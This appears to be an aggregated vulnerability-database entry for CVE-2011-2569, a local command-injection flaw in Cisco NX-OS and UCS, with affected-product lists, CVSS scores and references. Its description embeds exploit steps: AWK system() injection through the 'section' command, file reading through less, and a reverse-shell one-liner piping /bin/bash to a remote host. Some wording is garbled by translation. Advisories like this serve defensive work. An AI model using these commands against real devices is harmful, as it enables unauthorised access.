Details of VAR-201110-0195

ID

VAR-201110-0195

CVE

CVE-2011-2569

TITLE

Cisco Nexus OS and Cisco Unified Computing System Vulnerability gained in

Trust: 0.8

sources: JVNDB: JVNDB-2011-002700

DESCRIPTION

Cisco Nexus OS (aka NX-OS) 4.2 and 5.0 and Cisco Unified Computing System with software 1.4 and 2.0 do not properly restrict command-line options, which allows local users to gain privileges via unspecified vectors, aka Bug IDs CSCtf40008, CSCtg18363, CSCtr44645, CSCts10195, and CSCts10188. The problem is Bug ID CSCtf40008 , CSCtg18363 , CSCtr44645 , CSCts10195 ,and CSCts10188 It is a problem.Authority may be obtained by local users. The Cisco Nexus Series switches are data center switches. Adopt the Cisco Nexus OS operating system. The section command is used as an AWK script to pass the request string, but the input is not fully filtered. Any command can be executed on the LINUX subsystem. nx1# sh clock | sed 's/.*/BEGIN \\{ system\$\\\"id \"\$ \\}/' > 20110713.awk Warning: There is already a file existing with this name. Do you want to overwrite (yes/no)? [no] y nx1# sh clock | sec '* -f /bootflash /20110713.awk ' uid=2003(user) gid=504(network-operator) 11:16:04.082 UTC Wed Jul 13 2011 nx1# sh clock | sed 's/.*/BEGIN \\{ system\$\\\"ls \\/mnt\\/cfg\\/0\\/\"\$ \\}/' > 20110713.awk nx1# sh clock | sec '* -f /bootflash/20110713.awk ' ascii bin boot cfglabel.sysmgr debug licenses linux log lost +found 11:18:41.885 UTC Wed Jul 13 2011 can be used to delete any file in the boot flash or send the 'reboot' command. In addition, the less command Han total, press the colon and press the \"e\" key to specify the file path to be opened. You can view any system file: bin:*:1:1:bin:/bin: daemon:*:2:2:daemon :/usr/sbin: sys:*:3:3:sys:/dev: ftp:*:15:14:ftp:/var/ftp:/isanboot/bin/nobash ftpuser:UvdRSOzORvz9o:99:14:ftpuser: /var/ftp:/isanboot/bin/nobash nobody:*:65534:65534:nobody:/home:/bin/sh admin:x:2002:503::/var/home/admin:/isan/bin/vsh_perm Use \"|\" (pipe) and then press the \"$\" macro key to execute the command: !ls -lah > /bootflash/20110715 You can also create a remote shell by doing the following: mknod rs p; telnet ad.dr.es. s 8888 0<rs | /bin/bash 1>rs. A local attacker can exploit these issues to execute arbitrary commands with administrative privileges. Successful exploits may compromise the affected computer. Cisco MDS, UCS, Nexus 7000, 5000, 4000, 3000, 2000, and 1000V are vulnerable; other versions may also be affected

Trust: 2.52

sources: NVD: CVE-2011-2569 // JVNDB: JVNDB-2011-002700 // CNVD: CNVD-2011-4420 // BID: 50347 // VULHUB: VHN-50514

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2011-4420

AFFECTED PRODUCTS

vendor:	cisco	model:	unified computing system 1.4	scope:	-	version:	-	Trust: 2.4
vendor:	cisco	model:	nx-os	scope:	eq	version:	5.0	Trust: 1.9
vendor:	cisco	model:	nx-os	scope:	eq	version:	4.2	Trust: 1.6
vendor:	cisco	model:	unified computing system	scope:	eq	version:	-	Trust: 1.6
vendor:	cisco	model:	unified computing system infrastructure and unified computing system software	scope:	eq	version:	1.4$1j$	Trust: 1.0
vendor:	cisco	model:	unified computing system infrastructure and unified computing system software	scope:	eq	version:	2.0$1q$	Trust: 1.0
vendor:	cisco	model:	nx-os	scope:	eq	version:	4.2 and 5.0	Trust: 0.8
vendor:	cisco	model:	unified computing system	scope:	eq	version:	with software 1.4 and 2.0	Trust: 0.8
vendor:	cisco	model:	ucs	scope:	-	version:	-	Trust: 0.6
vendor:	cisco	model:	mds	scope:	-	version:	-	Trust: 0.6
vendor:	cisco	model:	nexus	scope:	eq	version:	1000v	Trust: 0.6
vendor:	cisco	model:	nexus	scope:	eq	version:	2000	Trust: 0.6
vendor:	cisco	model:	nexus	scope:	eq	version:	3000	Trust: 0.6
vendor:	cisco	model:	nexus	scope:	eq	version:	4000	Trust: 0.6
vendor:	cisco	model:	nexus	scope:	eq	version:	5000	Trust: 0.6
vendor:	cisco	model:	nexus	scope:	eq	version:	7000	Trust: 0.6
vendor:	cisco	model:	unified computing system	scope:	eq	version:	2.0	Trust: 0.3
vendor:	cisco	model:	unified computing system	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	nx-os 5.0 u1	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	nx-os 5.0 n2	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	eq	version:	5.0(3)	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	eq	version:	5.0(2)	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	eq	version:	5.0(0.54)	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	eq	version:	4.2.1	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	eq	version:	4.2(5)	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	eq	version:	4.2(4)	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	eq	version:	4.2(3)	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	eq	version:	4.2(2)	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	eq	version:	4.1(4)	Trust: 0.3
vendor:	cisco	model:	nx-os 4.1 n2	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	nx-os 4.0 n2	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	nexus	scope:	eq	version:	70000	Trust: 0.3
vendor:	cisco	model:	nexus	scope:	eq	version:	50000	Trust: 0.3
vendor:	cisco	model:	nexus	scope:	eq	version:	40000	Trust: 0.3
vendor:	cisco	model:	nexus	scope:	eq	version:	30000	Trust: 0.3
vendor:	cisco	model:	nexus	scope:	eq	version:	20000	Trust: 0.3
vendor:	cisco	model:	nexus	scope:	eq	version:	1000v0	Trust: 0.3
vendor:	cisco	model:	mds	scope:	eq	version:	9000	Trust: 0.3
vendor:	cisco	model:	mds	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified computing system 2.0	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	ne	version:	5.2(1)	Trust: 0.3
vendor:	cisco	model:	nx-os 5.1 n1	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	ne	version:	5.1(1)	Trust: 0.3
vendor:	cisco	model:	nx-os 5.0 u2	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	nx-os	scope:	ne	version:	4.2(6)	Trust: 0.3
vendor:	cisco	model:	nx-os 4.2 sv1	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	nx-os 4.2 n2	scope:	ne	version:	-	Trust: 0.3
vendor:	cisco	model:	nx-os 4.1 n2	scope:	ne	version:	-	Trust: 0.3

sources: CNVD: CNVD-2011-4420 // BID: 50347 // JVNDB: JVNDB-2011-002700 // CNNVD: CNNVD-201110-586 // NVD: CVE-2011-2569

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2011-2569
value:	MEDIUM
Trust: 1.0
NVD:	CVE-2011-2569
value:	MEDIUM
Trust: 0.8
CNNVD:	CNNVD-201110-586
value:	MEDIUM
Trust: 0.6
VULHUB:	VHN-50514
value:	MEDIUM
Trust: 0.1

nvd@nist.gov:	CVE-2011-2569
severity:	MEDIUM
baseScore:	6.8
vectorString:	AV:L/AC:L/AU:S/C:C/I:C/A:C
accessVector:	LOCAL
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	3.1
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
VULHUB:	VHN-50514
severity:	MEDIUM
baseScore:	6.8
vectorString:	AV:L/AC:L/AU:S/C:C/I:C/A:C
accessVector:	LOCAL
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	3.1
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

sources: VULHUB: VHN-50514 // JVNDB: JVNDB-2011-002700 // CNNVD: CNNVD-201110-586 // NVD: CVE-2011-2569

PROBLEMTYPE DATA

problemtype:

CWE-264

Trust: 1.9

sources: VULHUB: VHN-50514 // JVNDB: JVNDB-2011-002700 // NVD: CVE-2011-2569

THREAT TYPE

local

Trust: 0.9

sources: BID: 50347 // CNNVD: CNNVD-201110-586

TYPE

permissions and access control

Trust: 0.6

sources: CNNVD: CNNVD-201110-586

CONFIGURATIONS

sources: JVNDB: JVNDB-2011-002700

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-50514

PATCH

title:	24458	url:	http://tools.cisco.com/security/center/viewAlert.x?alertId=24458	Trust: 0.8
title:	Cisco Nexus OS 'section' and 'less' local command injection vulnerability patches	url:	https://www.cnvd.org.cn/patchInfo/show/5588	Trust: 0.6

sources: CNVD: CNVD-2011-4420 // JVNDB: JVNDB-2011-002700

EXTERNAL IDS

db:	NVD	id:	CVE-2011-2569	Trust: 3.4
db:	JVNDB	id:	JVNDB-2011-002700	Trust: 0.8
db:	CNNVD	id:	CNNVD-201110-586	Trust: 0.7
db:	CNVD	id:	CNVD-2011-4420	Trust: 0.6
db:	NSFOCUS	id:	18029	Trust: 0.6
db:	BID	id:	50347	Trust: 0.4
db:	PACKETSTORM	id:	106171	Trust: 0.1
db:	VULHUB	id:	VHN-50514	Trust: 0.1

sources: CNVD: CNVD-2011-4420 // VULHUB: VHN-50514 // BID: 50347 // JVNDB: JVNDB-2011-002700 // CNNVD: CNNVD-201110-586 // NVD: CVE-2011-2569

REFERENCES

url:	http://tools.cisco.com/security/center/viewalert.x?alertid=24458	Trust: 2.0
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-2569	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-2569	Trust: 0.8
url:	http://www.securityfocus.com/archive/1/520193	Trust: 0.6
url:	http://www.nsfocus.net/vulndb/18029	Trust: 0.6
url:	/archive/1/520193	Trust: 0.3
url:	/archive/1/520290	Trust: 0.3

sources: CNVD: CNVD-2011-4420 // VULHUB: VHN-50514 // BID: 50347 // JVNDB: JVNDB-2011-002700 // CNNVD: CNNVD-201110-586 // NVD: CVE-2011-2569

CREDITS

Peter Adkins

Trust: 0.9

sources: BID: 50347 // CNNVD: CNNVD-201110-586

SOURCES

db:	CNVD	id:	CNVD-2011-4420
db:	VULHUB	id:	VHN-50514
db:	BID	id:	50347
db:	JVNDB	id:	JVNDB-2011-002700
db:	CNNVD	id:	CNNVD-201110-586
db:	NVD	id:	CVE-2011-2569

LAST UPDATE DATE

2024-08-14T14:28:15.131000+00:00

SOURCES UPDATE DATE

db:	CNVD	id:	CNVD-2011-4420	date:	2011-10-25T00:00:00
db:	VULHUB	id:	VHN-50514	date:	2018-10-30T00:00:00
db:	BID	id:	50347	date:	2015-03-19T08:37:00
db:	JVNDB	id:	JVNDB-2011-002700	date:	2011-11-04T00:00:00
db:	CNNVD	id:	CNNVD-201110-586	date:	2011-11-07T00:00:00
db:	NVD	id:	CVE-2011-2569	date:	2018-10-30T16:26:47.373

SOURCES RELEASE DATE

db:	CNVD	id:	CNVD-2011-4420	date:	2011-10-25T00:00:00
db:	VULHUB	id:	VHN-50514	date:	2011-10-27T00:00:00
db:	BID	id:	50347	date:	2011-10-24T00:00:00
db:	JVNDB	id:	JVNDB-2011-002700	date:	2011-11-04T00:00:00
db:	CNNVD	id:	CNNVD-201110-586	date:	1900-01-01T00:00:00
db:	NVD	id:	CVE-2011-2569	date:	2011-10-27T21:55:00.730